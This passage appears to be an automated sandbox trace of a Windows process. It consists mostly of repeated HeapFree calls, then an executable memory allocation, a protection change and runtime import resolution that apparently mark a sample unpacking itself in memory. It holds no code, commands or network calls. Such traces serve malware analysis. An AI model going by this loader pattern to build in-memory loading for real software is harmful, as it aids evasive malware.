lpMem=0x2342180 | out: hHeap=0x520000) returned 1 [0135.466] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2355390 | out: hHeap=0x520000) returned 1 [0135.466] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x23685a0 | out: hHeap=0x520000) returned 1 [0135.466] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x237b7b0 | out: hHeap=0x520000) returned 1 [0135.466] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x238e9c0 | out: hHeap=0x520000) returned 1 [0135.466] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x23a1bd0 | out: hHeap=0x520000) returned 1 [0135.466] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x23b4de0 | out: hHeap=0x520000) returned 1 [0135.467] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x23c7ff0 | out: hHeap=0x520000) returned 1 [0135.470] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x23db200 | out: hHeap=0x520000) returned 1 [0135.471] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x23ee410 | out: hHeap=0x520000) returned 1 [0135.471] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2401620 | out: hHeap=0x520000) returned 1 [0135.471] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2414830 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2427a40 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x243ac50 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x244de60 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2461070 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2474280 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2487490 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x249a6a0 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x24ad8b0 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x24c0ac0 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x24d3cd0 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x24e6ee0 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x24fa0f0 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x250d300 | out: hHeap=0x520000) returned 1 [0135.475] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2520510 | out: hHeap=0x520000) returned 1 [0135.480] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2533720 | out: hHeap=0x520000) returned 1 [0135.480] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2546930 | out: hHeap=0x520000) returned 1 [0135.481] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2559b40 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x256cd50 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x257ff60 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2593170 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x25a6380 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x25b9590 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x25cc7a0 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x25df9b0 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x25f2bc0 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2610080 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2623290 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x26364a0 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x26496b0 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x265c8c0 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x266fad0 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2682ce0 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2695ef0 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x26a9100 | out: hHeap=0x520000) returned 1 [0135.482] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x26bc310 | out: hHeap=0x520000) returned 1 [0135.490] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x26cf520 | out: hHeap=0x520000) returned 1 [0135.615] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x26e2730 | out: hHeap=0x520000) returned 1 [0135.615] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x26f5940 | out: hHeap=0x520000) returned 1 [0135.615] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2708b50 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x271bd60 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x272ef70 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2742180 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2755390 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x27685a0 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x277b7b0 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x278e9c0 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x27a1bd0 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x27b4de0 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x27c7ff0 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x27db200 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x27ee410 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2801620 | out: hHeap=0x520000) returned 1 [0135.618] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2814830 | out: hHeap=0x520000) returned 1 [0135.622] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2827a40 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x283ac50 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x284de60 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2861070 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2874280 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2887490 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x289a6a0 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x28ad8b0 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x28c0ac0 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x28d3cd0 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x28e6ee0 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x28fa0f0 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x290d300 | out: hHeap=0x520000) returned 1 [0135.623] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2920510 | out: hHeap=0x520000) returned 1 [0135.627] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2933720 | out: hHeap=0x520000) returned 1 [0135.627] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2946930 | out: hHeap=0x520000) returned 1 [0135.627] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2959b40 | out: hHeap=0x520000) returned 1 [0135.627] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x296cd50 | out: hHeap=0x520000) returned 1 [0135.628] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x297ff60 | out: hHeap=0x520000) returned 1 [0135.629] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2993170 | out: hHeap=0x520000) returned 1 [0135.629] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x29a6380 | out: hHeap=0x520000) returned 1 [0135.629] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x29b9590 | out: hHeap=0x520000) returned 1 [0135.629] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x29cc7a0 | out: hHeap=0x520000) returned 1 [0135.629] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x29df9b0 | out: hHeap=0x520000) returned 1 [0135.629] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x29f2bc0 | out: hHeap=0x520000) returned 1 [0135.629] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2a05dd0 | out: hHeap=0x520000) returned 1 [0135.629] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2a18fe0 | out: hHeap=0x520000) returned 1 [0135.629] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2a2c1f0 | out: hHeap=0x520000) returned 1 [0135.634] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2a3f400 | out: hHeap=0x520000) returned 1 [0135.634] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2a52610 | out: hHeap=0x520000) returned 1 [0135.634] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2a65820 | out: hHeap=0x520000) returned 1 [0135.634] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2a78a30 | out: hHeap=0x520000) returned 1 [0135.634] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2a8bc40 | out: hHeap=0x520000) returned 1 [0135.635] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2a9ee50 | out: hHeap=0x520000) returned 1 [0135.636] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2ab2060 | out: hHeap=0x520000) returned 1 [0135.636] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2ac5270 | out: hHeap=0x520000) returned 1 [0135.636] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2ad8480 | out: hHeap=0x520000) returned 1 [0135.636] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2aeb690 | out: hHeap=0x520000) returned 1 [0135.636] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2afe8a0 | out: hHeap=0x520000) returned 1 [0135.636] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2b11ab0 | out: hHeap=0x520000) returned 1 [0135.636] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2b24cc0 | out: hHeap=0x520000) returned 1 [0135.636] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2b37ed0 | out: hHeap=0x520000) returned 1 [0135.640] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2b4b0e0 | out: hHeap=0x520000) returned 1 [0135.640] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2b5e2f0 | out: hHeap=0x520000) returned 1 [0135.640] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2b71500 | out: hHeap=0x520000) returned 1 [0135.640] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2b84710 | out: hHeap=0x520000) returned 1 [0135.640] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2b97920 | out: hHeap=0x520000) returned 1 [0135.640] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2baab30 | out: hHeap=0x520000) returned 1 [0135.642] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2bbdd40 | out: hHeap=0x520000) returned 1 [0135.643] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2bd0f50 | out: hHeap=0x520000) returned 1 [0135.643] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2be4160 | out: hHeap=0x520000) returned 1 [0135.643] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2bf7370 | out: hHeap=0x520000) returned 1 [0135.643] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2c0a580 | out: hHeap=0x520000) returned 1 [0135.643] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2c1d790 | out: hHeap=0x520000) returned 1 [0135.643] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2c309a0 | out: hHeap=0x520000) returned 1 [0135.643] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2c43bb0 | out: hHeap=0x520000) returned 1 [0135.647] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2c56dc0 | out: hHeap=0x520000) returned 1 [0135.647] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2c69fd0 | out: hHeap=0x520000) returned 1 [0135.647] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2c7d1e0 | out: hHeap=0x520000) returned 1 [0135.647] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2c903f0 | out: hHeap=0x520000) returned 1 [0135.647] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2ca3600 | out: hHeap=0x520000) returned 1 [0135.647] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2cb6810 | out: hHeap=0x520000) returned 1 [0135.649] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2cc9a20 | out: hHeap=0x520000) returned 1 [0135.846] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2cdcc30 | out: hHeap=0x520000) returned 1 [0135.846] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2cefe40 | out: hHeap=0x520000) returned 1 [0135.846] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d03050 | out: hHeap=0x520000) returned 1 [0135.846] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d16260 | out: hHeap=0x520000) returned 1 [0135.846] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d29470 | out: hHeap=0x520000) returned 1 [0135.846] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d3c680 | out: hHeap=0x520000) returned 1 [0135.846] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d4f890 | out: hHeap=0x520000) returned 1 [0135.851] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d62aa0 | out: hHeap=0x520000) returned 1 [0135.851] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d75cb0 | out: hHeap=0x520000) returned 1 [0135.851] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d88ec0 | out: hHeap=0x520000) returned 1 [0135.851] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d9c0d0 | out: hHeap=0x520000) returned 1 [0135.851] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2daf2e0 | out: hHeap=0x520000) returned 1 [0135.853] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2dc24f0 | out: hHeap=0x520000) returned 1 [0135.854] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2dd5700 | out: hHeap=0x520000) returned 1 [0135.854] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2de8910 | out: hHeap=0x520000) returned 1 [0135.854] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2e10080 | out: hHeap=0x520000) returned 1 [0135.854] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2e23290 | out: hHeap=0x520000) returned 1 [0135.854] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2e364a0 | out: hHeap=0x520000) returned 1 [0135.854] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2e496b0 | out: hHeap=0x520000) returned 1 [0135.854] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2e5c8c0 | out: hHeap=0x520000) returned 1 [0135.855] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2e6fad0 | out: hHeap=0x520000) returned 1 [0135.855] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2e82ce0 | out: hHeap=0x520000) returned 1 [0135.855] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2e95ef0 | out: hHeap=0x520000) returned 1 [0135.855] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2ea9100 | out: hHeap=0x520000) returned 1 [0135.861] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2ebc310 | out: hHeap=0x520000) returned 1 [0135.863] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2ecf520 | out: hHeap=0x520000) returned 1 [0135.863] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2ee2730 | out: hHeap=0x520000) returned 1 [0135.863] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2ef5940 | out: hHeap=0x520000) returned 1 [0135.863] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2f08b50 | out: hHeap=0x520000) returned 1 [0135.867] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2f1bd60 | out: hHeap=0x520000) returned 1 [0135.867] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2f2ef70 | out: hHeap=0x520000) returned 1 [0135.867] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2f42180 | out: hHeap=0x520000) returned 1 [0135.867] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2f55390 | out: hHeap=0x520000) returned 1 [0135.867] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2f685a0 | out: hHeap=0x520000) returned 1 [0135.867] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2f7b7b0 | out: hHeap=0x520000) returned 1 [0135.869] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2f8e9c0 | out: hHeap=0x520000) returned 1 [0135.871] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2fa1bd0 | out: hHeap=0x520000) returned 1 [0135.871] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2fb4de0 | out: hHeap=0x520000) returned 1 [0135.871] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2fc7ff0 | out: hHeap=0x520000) returned 1 [0135.871] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2fdb200 | out: hHeap=0x520000) returned 1 [0135.871] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2fee410 | out: hHeap=0x520000) returned 1 [0135.871] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3001620 | out: hHeap=0x520000) returned 1 [0135.871] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3014830 | out: hHeap=0x520000) returned 1 [0135.875] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3027a40 | out: hHeap=0x520000) returned 1 [0135.875] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x303ac50 | out: hHeap=0x520000) returned 1 [0135.876] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x304de60 | out: hHeap=0x520000) returned 1 [0135.877] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3061070 | out: hHeap=0x520000) returned 1 [0135.877] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3074280 | out: hHeap=0x520000) returned 1 [0135.877] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3087490 | out: hHeap=0x520000) returned 1 [0135.877] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x309a6a0 | out: hHeap=0x520000) returned 1 [0135.877] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x30ad8b0 | out: hHeap=0x520000) returned 1 [0135.877] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x30c0ac0 | out: hHeap=0x520000) returned 1 [0135.877] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x30d3cd0 | out: hHeap=0x520000) returned 1 [0135.877] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x30e6ee0 | out: hHeap=0x520000) returned 1 [0135.877] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x30fa0f0 | out: hHeap=0x520000) returned 1 [0135.966] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x310d300 | out: hHeap=0x520000) returned 1 [0135.968] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3120510 | out: hHeap=0x520000) returned 1 [0135.972] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3133720 | out: hHeap=0x520000) returned 1 [0136.631] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0136.635] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0136.636] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0136.637] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0136.637] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0136.637] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0136.637] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0136.637] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0136.638] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0136.638] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0136.638] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0136.638] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0136.638] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0136.638] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0136.638] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0136.638] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0136.639] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0136.639] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0136.639] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0136.639] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0136.639] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0136.639] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0136.639] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0136.640] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0136.640] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0136.640] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0136.640] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0136.640] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x54e1e0 | out: hHeap=0x520000) returned 1 [0136.641] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56dfe0 | out: hHeap=0x520000) returned 1 [0136.645] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x530bd0 | out: hHeap=0x520000) returned 1 [0136.647] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0136.647] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0136.648] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0136.648] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0136.648] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0136.648] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0136.650] GetProcessHeap () returned 0x520000 [0136.650] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x68) returned 0x523eb0 [0136.651] GetProcessHeap () returned 0x520000 [0136.651] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x539760 [0136.652] GetProcessHeap () returned 0x520000 [0136.652] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x48) returned 0x530ea0 [0136.652] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0136.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0136.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0136.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0136.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0136.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0136.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0136.652] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0136.653] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0136.653] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 